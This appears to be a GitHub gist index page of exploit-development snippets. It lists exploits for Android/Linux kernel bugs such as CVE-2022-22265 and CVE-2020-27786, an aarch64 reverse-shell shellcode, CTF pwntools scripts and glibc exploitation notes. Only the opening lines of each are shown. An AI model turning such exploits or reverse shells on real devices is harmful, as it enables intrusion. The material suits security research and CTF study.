@soez
soez / exp.c
Last active November 2, 2024 09:10
CVE-2022-22265 Samsung A25 npu driver
/*
*
* Author: @javierprtd
* Date : 01-08-2024
* Kernel: 5.10.177
* Samsung A25 NPU: CVE-2022-22265 (bug patched - reintroduced)
*
*/
// echo 1 > /sys/module/memlogger/holders/npu/drivers/platform:exynos-npu/npu_exynos/npu_err_in_dmesg
soez / shellcode.s
Created August 1, 2024 08:50
User-space aarch64 reverse-shell shellcode
.section .text
.global _start
_start:
// prologue: reserve stack frame and save callee-saved registers
sub sp, sp, #0xc0
stp x29, x30, [sp, #0x60]
stp x28, x27, [sp, #0x70]
stp x26, x25, [sp, #0x80]
stp x24, x23, [sp, #0x90]
soez / address_functions.c
Created August 1, 2024 06:54
Samsung virt_to_phys - phys_to_virt - virt_to_page - page_to_virt
#define MEMSTART 0x80000000UL
#define VIRTUAL_KERNEL_START 0xffffffc008000000UL
#define LINEAR_MAP_START 0xffffff8000000000UL
bool is_lm_addr(uint64_t kaddr)
{
return (kaddr & (VIRTUAL_KERNEL_START - (0x8 << (6 * 4)))) == LINEAR_MAP_START;
}
uint64_t virt_to_phys(uint64_t kaddr)
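The preview above stops at the signature of virt_to_phys. The following is an added example, not the gist's own code: it reuses the gist's three constants and its is_lm_addr test, and fills in the linear-map half of the translation using the standard arm64 arithmetic (phys = (va - PAGE_OFFSET) + PHYS_OFFSET), which is an assumption about what the truncated function does. Kernel-image addresses (those failing is_lm_addr) would need kimage_voffset, and virt_to_page/page_to_virt would need the vmemmap base; neither appears in the preview, so the helpers below return 0 for a non-linear-map address instead of guessing.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Constants exactly as in the gist preview (Samsung A25, kernel 5.10, 39-bit VA). */
#define MEMSTART             0x80000000UL
#define VIRTUAL_KERNEL_START 0xffffffc008000000UL
#define LINEAR_MAP_START     0xffffff8000000000UL

/* Same test as the gist: VIRTUAL_KERNEL_START - (0x8 << 24) == 0xffffffc000000000,
 * so the expression keeps the top bits of kaddr and compares them with the
 * linear-map base. Anything at or above the kernel image fails the test. */
bool is_lm_addr(uint64_t kaddr)
{
    return (kaddr & (VIRTUAL_KERNEL_START - (0x8 << (6 * 4)))) == LINEAR_MAP_START;
}

/* Linear-map VA -> PA. Assumption: standard arm64 __lm_to_phys arithmetic,
 * phys = (va - PAGE_OFFSET) + PHYS_OFFSET, with PHYS_OFFSET == MEMSTART.
 * Returns 0 for a VA outside the linear map (kimage translation not modelled). */
uint64_t lm_virt_to_phys(uint64_t kaddr)
{
    if (!is_lm_addr(kaddr))
        return 0;
    return (kaddr - LINEAR_MAP_START) + MEMSTART;
}

/* Inverse of lm_virt_to_phys. Returns 0 for a PA below the start of DRAM,
 * which has no linear-map alias. */
uint64_t lm_phys_to_virt(uint64_t paddr)
{
    if (paddr < MEMSTART)
        return 0;
    return (paddr - MEMSTART) + LINEAR_MAP_START;
}

int main(void)
{
    /* Constructed sample addresses: one linear-map VA, one kernel-image VA. */
    uint64_t lm_va  = 0xffffff80123450a8UL;
    uint64_t img_va = VIRTUAL_KERNEL_START + 0x1000UL;

    printf("%#lx is_lm=%d pa=%#lx\n", lm_va, is_lm_addr(lm_va), lm_virt_to_phys(lm_va));
    printf("%#lx is_lm=%d pa=%#lx\n", img_va, is_lm_addr(img_va), lm_virt_to_phys(img_va));
    printf("pa %#lx -> va %#lx\n", 0x80001000UL, lm_phys_to_virt(0x80001000UL));
    return 0;
}
```

The round trip lm_phys_to_virt(lm_virt_to_phys(va)) == va holds for any linear-map VA, which is the property an exploit relies on when it turns a leaked linear-map pointer into a physical address (or back) for a DMA-capable driver such as the NPU one in the first gist.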
soez / exp.c
Created September 30, 2023 14:24
Bluefrost challenge - EKOPARTY_2022
/*
*
* Author: @javierprtd
* Date : 28-09-2023
* Kernel: 6.2.0
*
*/
#define _GNU_SOURCE
#include <stdio.h>
soez / exp.c
Created July 2, 2023 21:23
No CVE for this: https://lkml.org/lkml/2019/12/5/814 (the bug has never been in the official kernel)
/*
*
* Author: @javierprtd
* Date : 22-06-2023
* Kernel: 5.10.77
* Bug : https://lkml.org/lkml/2019/12/5/814
* Review: This bug has never been in the official kernel
* Post : https://soez.github.io/posts/no-cve-for-this.-It-has-never-been-in-the-official-kernel
*
*/
soez / exploit-CVE-2020-27786.c
Created May 24, 2023 23:33
CVE-2020-27786 exploit
/*
*
* Author: @javierprtd
* Date : 21-05-2023
* Kernel: 4.9.220
*
*/
#include <stdio.h>
#include <stdlib.h>
soez / robots.py
Created October 1, 2022 21:06
Black Hat MEA CTF
from pwn import *
local = False
binary = ELF("./main", checksec = False)
libc = ELF("./libc-2.27.so", checksec = False)
def menu(n):
io.recvuntil("> ")
io.sendline(str(n))
soez / aarch64_virt_install.sh
Created September 24, 2022 06:56 — forked from yen3/aarch64_virt_install.sh
aarch64 virt-install commands
#!/bin/bash
rm -rf /home/yen3/ubuntu.qcow2
qemu-img create -f qcow2 /home/yen3/ubuntu.qcow2 10G
virsh undefine ubuntu1604arm64 --nvram
install_from_localtion() {
virt-install -n ubuntu1604arm64 --memory 1024 --arch aarch64 --vcpus 1 \
--disk /home/yen3/ubuntu.qcow2,device=disk,bus=virtio \
soez / mips64el-debian-qemu-exact-steps.md
Created September 24, 2022 06:48 — forked from bradfa/mips64el-debian-qemu-exact-steps.md
mips64el Debian QEMU install

Installing Debian Stretch mips64el Using QEMU

We're going to emulate the mips64el "malta" machine and install Debian Stretch using QEMU on an amd64 Debian Buster host.

You will likely need your user to be in the "libvirt" group and to have these packages (or a subset of them) installed:

sudo apt install qemu-system-mips virt-manager libguestfs-tools
soez / Tip
Last active September 13, 2022 18:35
# Glibc 2.35 Ubuntu 22.04
When exit() is called, execution passes through here (addresses shown without ASLR):
0x7ffff7daa390 <__run_exit_handlers>: endbr64
0x7ffff7daa394 <__run_exit_handlers+4>: push r15
0x7ffff7daa396 <__run_exit_handlers+6>: push r14
0x7ffff7daa398 <__run_exit_handlers+8>: push r13
0x7ffff7daa39a <__run_exit_handlers+10>: push r12
0x7ffff7daa39c <__run_exit_handlers+12>: mov r12,rsi
0x7ffff7daa39f <__run_exit_handlers+15>: push rbp